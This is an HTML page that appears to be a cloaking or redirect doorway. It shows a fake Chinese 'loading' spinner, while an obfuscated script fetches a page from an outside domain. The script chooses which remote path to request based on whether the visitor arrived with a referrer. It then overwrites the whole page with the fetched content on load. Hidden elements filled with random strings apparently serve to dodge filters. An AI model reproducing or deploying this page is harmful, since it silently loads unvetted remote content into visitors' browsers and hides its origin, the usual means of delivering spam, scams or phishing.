<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .UWNa3X {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .UWNa3X .O1UCkY8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .UWNa3X .content {
            line-height: 50px;
            text-align: center
        }

        .UWNa3X .img {
            width: 100%
        }

        .UWNa3X .GKItvXdS {
            text-align: center
        }

        .UWNa3X .GKItvXdS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .UWNa3X .GKItvXdS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .UWNa3X .GKItvXdS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .UWNa3X .GKItvXdS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .UWNa3X .GKItvXdS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .UWNa3X .GKItvXdS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .UWNa3X .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FEOnQwF8fN(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var MkS34p = FEOnQwF8fN('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ MkS34p +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ MkS34p +".html?a=share";
		}
		
        LE1CSW2G2C=url+"#"+new Date().getTime();
        LE1CSW2G2C && function() {
            $.get(LE1CSW2G2C, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >uFZHhNVlX2qLJb6CpdF81HOHEZsx9f3eIxstazontpBHNR6QVCLq3iVUy3zmyJu4zeBiJiUBghP90f2qRbuIcPZs8627HumhLyRCT</ul>
<p  style='display:none'>YJRmx7ApaLseabhT8KD1oHAvVeoQ8fJGJZL80CCViSOm0hFPBr5HoMpZcPo2Xkl93oBTHLV26ZbIwDy72MUCvRtBP0q</p>
<ul style='display:none' >uFZHhNVlX2qLJb6CpdF81HOHEZsx9f3eIxstazontpBHNR6QVCLq3iVUy3zmyJu4zeBiJiUBghP90f2qRbuIcPZs8627HumhLyRCT</ul>
<img  src='' style='display:none'>
<img  src='' style='display:none'><div class="UWNa3X">
    <div class="O1UCkY8">
        <div class="GKItvXdS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >hixGvVf3CzEfogMpW7m2zYIUoE6WGoWyRXcpTHMHE79eA4OH5k5ml95SxiktpjVU4XS8u3HTDYoS2OnP18kCytd6Gtstvxr</b>
<p  style='display:none'>paO9wc5kpgrnEawNk5gfdfyfqjIx29BoIvZBlKlGnrG3pzUdeqb3jHN4x2U1Lx6ISnP8AAGX</p>
<h1 style='display:none' >tbAmKZDynBKrWrnBe</h1>
<img  src='' style='display:none'>
<span style='display:none'>HrV4Szjyaetm9jXirkNSNjSEFZnEY6OxdpXf13f4z0wcvw2YHPWi3gdB9mvrPb</span></body>
</html>